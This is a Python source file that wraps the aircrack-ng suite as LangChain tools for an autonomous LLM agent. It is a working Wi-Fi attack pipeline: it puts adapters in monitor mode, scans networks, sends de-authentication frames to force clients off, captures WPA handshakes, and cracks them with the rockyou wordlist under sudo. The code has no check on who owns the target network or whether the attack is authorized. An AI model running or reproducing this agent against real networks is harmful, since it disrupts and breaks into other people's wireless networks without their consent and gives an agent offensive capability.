import json
import random
import shlex
import threading

from langchain_core.pydantic_v1 import BaseModel, Field
from langchain.tools import tool
from langchain_community.tools import ShellTool

"""
All of my tools are built to run pre-defined shell tools in particular ways and
generally just take CLI parameters as input. I could have given my agent 1 simple
terminal tool, and a strong prompt mentioning the various kali applications used
here and let it figure out the details. That might have worked with a lot less
code, but when done like this, we lessen the chance that a 'sudo' command goes
rogue, and we also handle the needed multithreading case in python
"""

shell_tool = ShellTool()

# NOTE: LangChain's @tool decorator takes the tool description shown to the LLM
# from the decorated function's docstring, and the first positional argument is
# the tool name. Those strings are therefore runtime text and are kept verbatim;
# developer-facing documentation lives in `#` comments next to each tool.


def _load_json_params(raw: str) -> dict:
    """Decode the JSON object string an LLM passed to a tool.

    The raw text is tried first. If it is not valid JSON (LLMs frequently send
    backslash-escaped quotes such as ``{\\"bssid\\": ...}``), all backslashes are
    stripped and decoding is retried.

    Args:
        raw: The ``json_params`` string received by the tool.

    Returns:
        The decoded JSON value; callers index it as a dict.

    Raises:
        json.JSONDecodeError: If the text is not valid JSON even after the
            backslashes have been removed.
    """
    try:
        return json.loads(raw)
    except json.JSONDecodeError:
        return json.loads(raw.replace("\\", ""))


def _quote(value) -> str:
    """Return *value* as a single shell-safe token.

    JSON values may be ints (e.g. a channel number), hence the ``str`` call.
    """
    return shlex.quote(str(value))


def _sanitize_cli_params(params: str) -> str:
    """Turn free-form CLI parameters from the LLM into shell-safe arguments.

    Backticks and newlines are dropped (buggy LLM output), then the text is
    tokenised and every token is shell-quoted, so metacharacters such as ``;``,
    ``|`` or ``$(...)`` reach the wrapped program as literal arguments instead
    of being interpreted by the shell.

    Args:
        params: Space-separated command-line parameters; may be empty.

    Returns:
        The parameters re-joined with single spaces, each one quoted as needed.
    """
    cleaned = params.replace("`", "").replace("\n", "")
    try:
        tokens = shlex.split(cleaned)
    except ValueError:
        # Unbalanced quotes: fall back to plain whitespace splitting.
        tokens = cleaned.split()
    return " ".join(shlex.quote(token) for token in tokens)


"""
Crack password is a wrapper to run aircrack-ng and expects the LLM to provide
the BSSID and packet capture file containing the handshake. Some extra work
could be done here to improve robustness including
1) Handle gracefully if the .cap does not actually contain a handshake
2) Take in a custom wordlist provided by the LLM OR
3) Dynamically load one or more word lists on the fly from the wordlist directory
4) Show some user feedback while cracking - this can take a while =/
"""


class CrackPassword(BaseModel):
    # JSON object string with the keys 'bssid' and 'capfile'.
    json_params: str = Field(
        description=(
            "Should be a string of a json object containing "
            "'bssid': the bssid of the network to crack. "
            "'capfile': the path to the capture file containing the handshake. \n"
        )
    )


# Runs aircrack-ng against `capfile` for the network `bssid` using the bundled
# rockyou wordlist and returns the shell output directly to the user
# (return_direct=True).
# Raises json.JSONDecodeError on undecodable input and KeyError when 'bssid' or
# 'capfile' is missing.
@tool(
    "Perform wifi encryption cracking with aircrack-ng",
    args_schema=CrackPassword,
    return_direct=True,
)
def wifi_encryption_cracking(json_params: str) -> str:
    """Must pass bssid and capfile parameters (as a string containing a json object) to aircrack-ng to perform wifi encryption cracking"""
    json_obj = _load_json_params(json_params)
    # Quote LLM-supplied values so they cannot inject extra shell commands.
    bssid = _quote(json_obj["bssid"])
    cap = _quote(json_obj["capfile"])
    # TODO: Abstract out wordlist - allow custom/multiple wordlist files as long
    # as they sit in the directory
    return shell_tool.run(
        {"commands": [f"aircrack-ng --bssid {bssid} -w wordlist/rockyou.txt {cap}"]}
    )


"""
This tool helps us run a combination of airodump-ng and aireplay-ng
simultaneously to de-auth and capture the handshake. Because we must run these
at the same time, we cannot just re-use the reconnaissance tool; instead we need
this tool which runs each process in a separate thread. Overall this works ok
assuming the client device chooses to re-connect after a de-auth, which you
cannot always control.
"""


class DeauthAndCapture(BaseModel):
    # JSON object string with the keys 'bssid', 'channel', 'client', 'interface'.
    json_params: str = Field(
        description="Should be a string of a json object containing 'bssid', 'channel', client' and 'interface' for the network BSSID, wif channel, de-auth client target id, and the wireless interface respectively"
    )


# Starts airodump-ng (capture, force-killed after 15 s) and aireplay-ng (10
# de-auth frames) in two threads, waits for both, and returns the path of the
# capture file airodump-ng is expected to have written.
# Raises json.JSONDecodeError on undecodable input and KeyError when a required
# key is missing.
@tool(
    "Perform a de-auth and capture for a given wifi BSSID, channel, and client on the given wireless. All parameters must be identified first. Return the path to the handshake capture pcap file",
    args_schema=DeauthAndCapture,
    return_direct=False,
)
def deauth_and_capture(json_params: str) -> str:
    """Can pass bssid, client, channel, and interface parameters to aireplay-ng to perform and capture a de-auth.
    All parameters must be identified first"""
    json_obj = _load_json_params(json_params)
    # Quote LLM-supplied values: both commands below run under sudo.
    bssid = _quote(json_obj["bssid"])
    client = _quote(json_obj["client"])
    interface = _quote(json_obj["interface"])
    channel = _quote(json_obj["channel"])

    # Random suffix so repeated runs write to different dump files.
    capture_id = random.getrandbits(16)
    out = f"dumps/deauth-capture-{capture_id}"

    def run_airdump(channel, bssid, out, interface):
        # airodump-ng never stops on its own, so `timeout` kills it.
        shell_tool.run(
            {
                "commands": [
                    f"sudo timeout -s SIGKILL 15 airodump-ng --band a --channel {channel} --bssid {bssid} --write {out} {interface}"
                ]
            }
        )

    def run_aireplay(bssid, client, interface):
        shell_tool.run(
            {
                "commands": [
                    f"sudo aireplay-ng --deauth 10 -a {bssid} -c {client} {interface}"
                ]
            }
        )

    dumpthread = threading.Thread(
        target=run_airdump, args=(channel, bssid, out, interface)
    )
    playthread = threading.Thread(
        target=run_aireplay, args=(bssid, client, interface)
    )

    dumpthread.start()
    playthread.start()

    dumpthread.join()
    playthread.join()

    # Return the path to the handshake capture file ("-01.cap" is appended to
    # the --write prefix).
    return f"{out}-01.cap"


"""
This tool wraps airodump-ng. airodump is tricky to work with - it does not have
any parameter to stop on its own so it needs a timing control, and the SIGKILL
is unfortunately what it takes. It also does not do well with printing to stdout
in this environment, so we must print to a dump file, and read the contents of
the dump file to get this tool to return what we are interested in. I looked
into other approaches like 'iw scan', they had their own problems so we just
stick with the aircrack suite
"""


class PacketCapture(BaseModel):
    # Interface name, optionally followed by extra airodump-ng flags.
    params: str = Field(
        description="Should be the interface name on which to perform reconnaissance, followed by any optional command line flag parameters"
    )


# Runs airodump-ng for 30 s writing CSV to dumps/dump-<id>, then returns the
# contents of the resulting CSV file. If the file cannot be read, a hint string
# is returned instead of raising so the agent can react to it.
@tool(
    "Perform wifi reconnaissance with airodump-ng. Interface must be in monitor mode before starting",
    args_schema=PacketCapture,
    return_direct=False,
)
def reconnaissance(params: str) -> str:
    """Use airodump-ng to gather wireless network information.
    Must take the interface as a parameter and may optionally be followed by command like flag parameters"""
    capture_id = random.getrandbits(16)
    prefix = f"dumps/dump-{capture_id}"
    safe_params = _sanitize_cli_params(params)

    # band a for 5Ghz - TODO: make it smart enough to figure out the band you
    # want, or perhaps to ask
    shell_tool.run(
        {
            "commands": [
                f"sudo timeout -s SIGKILL 30 airodump-ng --band a --output-format csv --write {prefix} {safe_params} "
            ]
        }
    )

    try:
        with open(f"{prefix}-01.csv", "r") as file:
            return file.read()
    except (OSError, UnicodeDecodeError):
        # The previous `except FileNotFoundError | Exception:` is not a valid
        # except target and raised TypeError whenever the file was missing.
        # FileNotFoundError is a subclass of OSError.
        return "The file does not exist. Ensure interface is in monitor mode before using this tool"


"""
Straightforward tool wrapping airmon-ng
"""


class ChangeMonitorMode(BaseModel):
    # Arguments handed to `airmon-ng`.
    params: str = Field(
        description="Should be command line parameters to 'airmon-ng' to change the state of a given wireless iterface mode."
    )


# Runs `sudo airmon-ng <params>` followed by a 5 s sleep and returns the shell
# output.
@tool(
    "Change the state of the wireless adapter mode with airmon-ng",
    args_schema=ChangeMonitorMode,
    return_direct=False,
)
def change_adapter_mode(params: str) -> str:
    """Can pass parameters to airmon-ng to change the mode of the wireless adapter"""
    params = _sanitize_cli_params(params)  # fix buggy input from LLM
    # The mode change takes time, so sleep before returning.
    return shell_tool.run({"commands": [f"sudo airmon-ng {params}", "sleep 5s"]})


"""
Straightforward tool wrapping iwconfig
"""


class Iwconfig(BaseModel):
    # Arguments handed to `iwconfig`; may be an empty string.
    params: str = Field(
        description="should be command line parameters to 'iwconfig'. If none are needed, this should be left as an empty string"
    )


# Runs `iwconfig <params>` and returns the shell output.
@tool("Get interface information", args_schema=Iwconfig, return_direct=False)
def get_wireless_interface(params: str) -> str:
    """Return wireless interface information via iwconfig"""
    params = _sanitize_cli_params(params)  # fix buggy input from LLM
    print("params ", params)
    return shell_tool.run({"commands": [f"iwconfig {params}"]})